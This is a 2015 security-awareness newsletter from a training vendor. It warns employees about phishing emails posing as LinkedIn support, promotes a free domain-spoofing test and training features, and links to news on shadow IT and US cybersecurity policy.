CyberheistNews Vol 5 #4 Jan 27, 2015 Scam Of The Week: LinkedIn Support Phishing Emails



 

                                                                                                               

                                      

                               
    
                                                            
                                                                                                                                          
                                                                                                                                       

Scam Of The Week: LinkedIn Support Phishing Emails

The scam is at least 15 years old if not more, but unfortunately this type  of social engineering still works. Remind your users one more time that  emails like this can hit their inbox at any time, because some modern spam  techniques are able to bypass all the mail filters you have in place. I  would send them this, or something close to it. Feel free to edit and send  it to all employees and friends. (You could suggest they turn on LinkedIn's  two-factor authentication).

Recently, scammers are attacking people with LinkedIn accounts using phishing e-mails claiming to be a LinkedIn Tech Support message. In these fake e-mails it  is stated that "irregular activities" are happening on your LinkedIn account  which require a mandatory security update of your account.

Obviously this is all a scam, and the purpose of the emails is to get you to  fill out an attached HTML form which is a spoofed LinkedIn login page. What  you fill out does not get you logged into the site but gets sent to the  bad guys who then own your account.

You can recognize this scam because the email uses a lowercase "i" instead  of a capital "I" when spelling “Linkedin”. To see what the scam email looks like, check the picture at the KnowBe4 Blog. Remember: "When in doubt, throw it out!"
http://blog.knowbe4.com/scam-of-the-week-linkedin-support-phishing-emails

Despite all the software and hardware protection layers in place, things slip  by on a regular basis. The bad guys have their own labs and run all the  popular spam filters in-house, so they can test until they have a phishing  attack that makes it through.

You really need a "human firewall" in place so stepping your users through  effective security awareness training is a must these days.


Warm Regards,
Stu Sjouwerman



Quotes Of The Week

 

Quotes of the Week:

" You can tell more about a person by what he says about others than you  can by what others say about him.  "  - Audrey Hepburn

" If you can't explain it simply, you don't understand it well enough. "  - Albert Einstein

Security News

 

Can Bad Guys Impersonate Your Executives?

Can the bad guys impersonate one of your co-workers or your C-level execs? In other words, can your domain be spoofed? KnowBe4 can help  you find out in one minute with our free Domain Spoof Test.

The Domain Spoof Test sheds light on a major potential vulnerability;  email servers not being correctly configured. Bad guys using your organization's publicly available email addresses can attack your employees by impersonating (spoofing) a co-worker or executive.

We offer a free one-time Domain Spoof Test (DST) that verifies whether  a hacker can disguise a malicious phishing email as a normal message  from someone within your organization, such as a manager or CEO. If  this is possible, hackers can easily launch a spear-phishing attack.

The only thing we do is send one email TO you, FROM you, (spoofed). If you  receive this email, bad guys can spoof your domain too. It takes 1  minute, so request the free domain spoof test for your own domain  name. Click here and fill out the form:
https://info.knowbe4.com/domainspooftest-15-01-27

Exciting New Features We Recently Released

It's been a while since we released a full list of all recently added  Kevin Mitnick Security Awareness Training features. It's getting to be a pretty exciting list! And know this is purely based on feedback you have given us in your earlier survey answers. This is everything you need and nothing  you don't. "For admins by admins", and as lean as possible. Check it out,  you may not yet know about some new feature that you could use!
https://www.knowbe4.com/security-awareness-training-features/

Focus On Security Obscures Rise Of "Shadow IT"

Nearly three-quarters of IT security professionals are unaware of  the amount of “shadow IT” within their organizations, according to a  recent survey by the Cloud Security Alliance.

Shadow IT, according to CSA, is technology spending and implementation  that occurs outside the IT department, including cloud apps adopted  by individual employees, teams and business units. “Employees are  more empowered than ever before to find and use cloud applications,  often with limited or no involvement from the IT department,”  according to the survey report, which interviewed 212 participants  around the world in professional IT security roles.

Some organizations block certain cloud services altogether, such as  those from Dropbox, Facebook, Apple iCloud, Tumblr, but that can be  even riskier if employees seek out alternatives that have less  mature security controls, CSA said.  More:
https://gcn.com/articles/2015/01/20/shadow-it.aspx?s=gcntech_210115

Harvard Business Review Cybersecurity Article

President Obama’s new raft of proposals aim to address the growing  concern that America is not taking tough-enough action against the  increasing cybersecurity problem of nation-states and criminals  (usually criminal gangs) attacking U.S. consumers and organizations. 

The evildoers’ motivation for doing so is most often money, but  intellectual property is also being filched, and the internet is  also being used for anything from identity theft to illicit  political objectives.

Good message at the end of this Harvard article: "Most important is  education: Everyone — individuals, employees, companies, and boards  of directors — needs to understand the new dangers." More:
https://hbr.org/2015/01/the-flaws-in-obamas-cybersecurity-initiative 

Watch two women fall in love with Tesla Model S P85D:

https://www.autoblog.com/2015/01/20/watch-two-women-in-love-tesla-model-s-p85d-video/

May The Best Robot Win! The new DARPA challenge - see this new hardware:
https://youtu.be/27HkxMo6qK0

Codebases - how many millions of lines of code in which product? Enlightening!
https://www.informationisbeautiful.net/visualizations/million-lines-of-code/     

                    
                                                  
 
                                           



Subscribe To Our Blog


Comprehensive Anti-Phishing Guide




Get the latest about social engineering

Subscribe to CyberheistNews